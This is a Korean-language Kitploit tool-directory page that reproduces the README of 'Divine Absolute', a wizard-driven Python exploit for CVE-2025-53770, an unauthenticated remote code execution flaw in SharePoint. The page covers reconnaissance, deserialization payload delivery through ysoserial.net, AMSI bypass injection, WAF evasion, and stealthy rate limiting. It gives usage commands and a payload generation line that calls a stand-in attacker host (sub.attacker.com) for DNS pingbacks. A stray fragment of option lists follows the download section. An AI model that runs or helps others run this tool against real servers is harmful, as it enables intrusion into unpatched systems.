Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-53770 — 온프레미스 Microsoft SharePoint Server(2016, 2019, Subscription Edition)의 치명적인(CVSS 9.8) 인증 없는 원격 코드 실행(RCE) 취약점인 CVE-2025-53770을 대상으로 하는 정교한 위저드 기반 Python 익스플로잇 도구입니다. | Kitploit
도구/GitHubGitHub/exfil0/cve-2025-53770
Privilege EscalationReconnaissancePayload GenerationVulnerability AnalysisExploitationIDS/IPS EvasionWeb Application ExploitationPost-ExploitationPenetration TestingCommand and Control
GitHubexfil0/cve-2025-53770
5121년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-53770

온프레미스 Microsoft SharePoint Server(2016, 2019, Subscription Edition)의 치명적인(CVSS 9.8) 인증 없는 원격 코드 실행(RCE) 취약점인 CVE-2025-53770을 대상으로 하는 정교한 위저드 기반 Python 익스플로잇 도구입니다.

저장소 보기

Divine Absolute - CVE-2025-53770 익스플로잇 도구

License
Python

개요

Divine Absolute는 CVE-2025-53770을 표적으로 하는 정교한 위저드 기반 Python 익스플로잇 도구입니다. 이 취약점은 온프레미스 Microsoft SharePoint Server(2016, 2019, Subscription Edition)에서 발생하는 치명적인(CVSS 9.8) 인증되지 않은 원격 코드 실행(RCE) 취약점입니다. 2025년 7월 19일 제로데이로 공개된 이 취약점은 /_layouts/15/ToolPane.aspx에서 신뢰할 수 없는 데이터의 역직렬화에서 비롯됩니다. 이 도구는 윤리적 침투 테스트 및 승인된 보안 연구 전용으로 설계되었으며, 정찰, 익스플로잇 및 검증을 위한 탁월한 정밀성, 은밀성, 적응성을 제공합니다.

저장소: https://github.com/exfil0/CVE-2025-53770

⚠️ 법적 경고: 이 도구는 명시적 허가를 받은 통제된 환경에서의 합법적이고 승인된 사용 전용입니다. 소유하지 않았거나 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법이며 심각한 법적 결과를 초래할 수 있습니다. 저자는 오용에 대해 어떠한 책임도 지지 않습니다.

기능

  • 모드:
    • Recon(정찰): 고급 점수 산정 및 정규식(예: 16.0.0.\d+-\w+?)을 통해 SharePoint 존재 여부, 버전 및 ToolPane.aspx 접근성을 탐지합니다.
    • Exploit(익스플로잇): 강력한 우회 기법을 통해 ToolPane.aspx에 페이로드를 전달합니다.
    • Full(전체): 정찰과 익스플로잇을 결합하며, 선택적으로 공격적인 익스플로잇 모드를 제공합니다.
  • 페이로드 생성:
    • .NET 역직렬화 페이로드(예: ObjectDataProvider, LosFormatter)를 위한 ysoserial.net 통합.
    • 대체 HTTP/DNS 핑백 페이로드(예: WebRequest.Create, Dns.GetHostEntry)를 위한 선택적 pythonnet.
    • 명시적 인코딩/디코딩 및 base64 검증을 통한 GZIP 압축 지원.
    • 기본 리플렉션, 난독화 또는 사용자 정의 스니펫 등 AMSI 우회 코드를 PowerShell 명령어에 주입하며, base64 인코딩(-enc) 페이로드도 포함합니다.
  • 우회 기법:
    • URI 회피: 무작위 또는 고정 접미사(예: /xp.aspx, UUID 기반).
    • Referer 스푸핑: 없음, 외부 도메인(예: www.google.com), 사용자 정의 URL 또는 내부 SharePoint 경로(예: /_layouts/15/sharepoint.aspx).
  • 은밀성:
    • 최소 RPS 하한(0.01) 및 버스트 제어 기능을 갖춘 적응형 속도 제한.
    • 잠금으로 보호된 페이싱 및 지터(0-0.1초)를 갖춘 스레드 안전 동시성.
  • 검증:
    • 컴파일된 OR 정규식, RequestException 재시도, 사용자 정의 상태 코드/경로를 통한 강력한 RCE 확인.
  • 정찰:
    • 헤더(예: MicrosoftSharePointTeamServices), 경로(예: /versions.aspx) 및 정규식을 통한 향상된 SharePoint 탐지.
  • 출력:
    • 분석을 위한 포렌식 로깅이 포함된 JSON 결과.
  • 사용성:
    • 쉬운 구성을 위한 대화형 위저드.
    • 비Windows 시스템에서 ysoserial.net을 위한 Mono/Wine 지원.
    • 프록시 지원(HTTP/SOCKS5) 및 사용자 정의 타임아웃.

CVE-2025-53770 컨텍스트

  • 취약점: /_layouts/15/ToolPane.aspx의 역직렬화를 통한 인증되지 않은 RCE.
  • 영향 대상: SharePoint Server 2016, 2019, Subscription Edition(EOL 2010/2013도 취약).
  • 영향 없음: SharePoint Online(M365).
  • 악용: 2025년 7월 18일부터 "ToolShell"과 같은 캠페인에서 국가 후원 공격자(예: Linen Typhoon)에 의해 악용됨.
  • 패치: 2025년 7월 19일에 릴리스된 Microsoft 패치(예: KB5002768, KB5002754)로 완전히 완화됩니다. CISA KEV 목록은 2025년 7월 21일까지 연방 차원의 패치 적용을 의무화합니다.
  • 완화 조치: 패치 적용, 패치 후 키 순환, AMSI/Defender 활성화(전체 모드), /ToolPane.aspx POST 모니터링, WAF 규칙(예: Cloudflare) 사용.

설치

전제 조건

  • Python 3.8+
  • 의존성:
    root@kitploit:~
    pip install requests termcolor
    
  • 선택 사항(.NET 직렬화 대체용):
    root@kitploit:~
    pip install pythonnet
    
  • ysoserial.net:
    • ysoserial.net 릴리스에서 다운로드.
    • ysoserial.exe를 알려진 경로(예: ./ysoserial.exe)에 배치.
  • Mono/Wine(비Windows 시스템):
    root@kitploit:~
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (via Homebrew)
    brew install mono
    
  • Docker 랩(테스트 권장):
    root@kitploit:~
    docker pull mcr.microsoft.com/sharepoint/server:2019
    

설정

  1. 저장소를 클론합니다:
    root@kitploit:~
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
    
  2. Python 의존성을 설치합니다:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. ysoserial.exe에 접근 가능한지 확인하거나 실행 중 경로를 제공합니다.
  4. (선택 사항) 비Windows 시스템에서 Mono/Wine을 확인합니다.

사용법

대화형 위저드를 실행합니다:

root@kitploit:~
python divine_absolute.py

워크플로

  1. 모드 선택:
    • Recon: SharePoint 존재 여부와 버전을 스캔합니다.
    • Exploit: ToolPane.aspx에 페이로드를 전송합니다.
    • Full: 정찰 + 익스플로잇(선택적 공격 모드).
  2. 대상 입력:
    • 단일 URL(예: https://sharepoint.example.com).
    • URL 목록이 포함된 파일(줄당 하나).
  3. 페이로드 구성:
    • ysoserial.net: 경로, 가젯(예: ObjectDataProvider) 및 명령어(예: cmd /c whoami)를 지정합니다.
    • File: 파일에서 base64 GZIP 페이로드를 로드합니다.
    • String: base64 GZIP 페이로드를 직접 입력합니다.
    • Pingback: HTTP/DNS 핑백을 생성합니다(예: http://attacker.com/callback 또는 sub.attacker.com).
    • AMSI 우회: NONE, BASIC_REFLECTION, 또는 사용자 정의 스니펫을 선택합니다.

예제 명령어

  • 정찰:
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Recon, Target=https://sharepoint.example.com
    
  • ysoserial.net을 이용한 익스플로잇:
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
    
  • 검증이 포함된 전체 모드:
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
    
  • DNS 핑백:
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
    

출력

결과는 다음 필드와 함께 xanthorox_results.json에 저장됩니다:

  • target: 테스트된 URL.
  • sharepoint_detected: 부울 값.
  • toolpane_accessible: 부울 값.
  • exploited: 부울 값(페이로드 전송 여부).
  • verified_rce: 부울/없음(RCE 확인 여부).
  • error: 발생한 오류.

예시:

root@kitploit:~
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

개선된 사항

이 버전에서는 다음을 수정했습니다:

  • 적응형 속도 제한: 성공/오류 카운트에서 재시도 불가 오류(예: 404)를 무시하고, 최소 RPS 하한(0.01)을 적용합니다.
  • AMSI 주입: base64 인코딩된 PowerShell(-enc) 명령어를 디코딩하고 우회 코드를 주입하며, 비PowerShell(예: cmd.exe)은 경고와 함께 지원합니다.
  • 핑백 대체: Dns.GetHostEntry를 통한 안정적인 DNS 핑백을 위해 pythonnet을 사용합니다(실험적, 완전한 효과를 위해 가젯 필요).

테스트 권장 사항

  • 랩 설정: 안전한 테스트를 위해 패치되지 않은 SharePoint Server 2019 Docker 컨테이너를 사용합니다.
  • WAF 테스트: 적응형 RPS로 Cloudflare 또는 유사한 WAF에 대한 우회 기법을 검증합니다.
  • 페이로드 테스트: ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64로 페이로드를 생성하고 DNS 로그를 확인합니다.

알려진 제한 사항

  • 핑백 신뢰성: pythonnet의 Dns.GetHostEntry는 특정 가젯 체인 없이는 트리거되지 않을 수 있습니다.
  • 복잡한 명령어: 비표준 PowerShell 명령어는 수동 AMSI 우회 주입이 필요할 수 있습니다.
  • WAF 탐지: 일부 WAF는 우회 기법에도 불구하고 페이로드를 차단할 수 있습니다. 철저히 테스트하십시오.

기여

기여는 환영합니다! 다음을 수행해 주세요:

  1. 저장소를 포크합니다.
  2. 기능 브랜치를 생성합니다(git checkout -b feature/awesome-improvement).
  3. 변경 사항을 커밋합니다(git commit -m "Add awesome improvement").
  4. 브랜치에 푸시합니다(git push origin feature/awesome-improvement).
  5. 풀 리퀘스트를 엽니다.

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE를 참조하십시오.

감사의 말

  • xAI: 최첨단 보안 연구에 영감을 준 것에 대해.
  • ysoserial.net 팀: .NET 역직렬화 페이로드 생성기를 제공한 것에 대해.
  • 보안 커뮤니티: CVE-2025-53770 악용 및 완화에 대한 통찰력을 제공한 것에 대해.

연락처

  • 저자: @exfil0
  • 이슈: GitHub Issues
  • 텔레그램: https://t.me/GOTOCVE

참고: 사용 전에 항상 통제된 랩 환경에서 페이로드와 구성을 검증하십시오. 윤리적이고 합법적으로 행동하십시오.

도구 다운로드
CONCAT_OBFUSCATED
  • 우회 옵션:
    • URI: NONE, FIXED(예: /xp.aspx), RANDOM(UUID 기반).
    • Referer: DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.
  • 네트워크 설정:
    • 프록시(예: http://127.0.0.1:8080).
    • 스레드, 타임아웃, 지터 및 속도 제한(RPS).
  • RCE 검증:
    • 경로(예: /sitepages/result.txt), 정규식(예: Xanthorox.*), 상태 코드(예: 200,403), 시도 횟수, 지연 및 타임아웃을 지정합니다.